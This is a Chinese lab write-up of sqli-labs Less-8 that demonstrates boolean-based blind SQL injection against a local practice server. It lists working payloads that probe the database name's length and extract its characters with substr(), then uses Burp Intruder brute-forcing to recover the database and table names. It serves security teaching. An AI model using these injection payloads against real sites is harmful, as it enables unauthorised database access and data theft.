sql-labs-less8 基于盲注的boolan注入全过程

sql-labs-less8 GET - Blind - Boolan Based - Single Quotes

step0 准备

http://192.168.139.138/sqli-labs/Less-8/

HackBar

MySQL

Apache

step1 测试

首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1
result:
yes

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1'
result:
no

这里我们无法看到后台所返回的结果,所以这里不可以使用union注入,所以这里我们使用boolan注入法,第一步我们先判断数据库名的长度,

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=5 -- +
result:
yes

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=10 -- +
result:
no

所以数据库长度位于5~9之间,我们可以用二分法测试,下一个是7。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=7 -- +
result:
yes
----------------------------7~9-----------------------
payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=8 -- +
result:
yes
----------------------------8~9----------------------
payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and length(database())>=9 -- +
result:
no

所以我们知道了数据库名字长度为8。接下来我们通过substr()函数,与limit函数不同,是从1下标开始的。数据库名的范围一般在a~z, 0~9之内,可能还有一些特殊字符,这里的字母不区分大小写。这里八个有点多,我们采用burp抓包来爆破一下。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and substr(database(),1,1)='a' -- +这里的1,1表示从第一个字符开始,往后第一个字符 

在这里插入图片描述


右击发到 intruder模块,send to intruder


在这里插入图片描述


在这里插入图片描述


在图中,两个位置添加$注入符号,然后选择 攻击种类为Cluster bomb。

其中payload 1选择1~8,payload 2选择a-z,0-9


在这里插入图片描述


在这里插入图片描述

在这里插入图片描述


如上图得到结果:数据库名为security,下一步爆表名。

payload:
http://192.168.139.138/sqli-labs/Less-8/?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a' --+

方法和上面一样。在这里插入图片描述


得到的结果导入到excel表格中。我们利用表格排序,得到以下结果

在这里插入图片描述


step2 结论

组合一下就是emails,referers,uagents,users

下面的操作就和上面的很类似了,在这里就不一一演示了。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值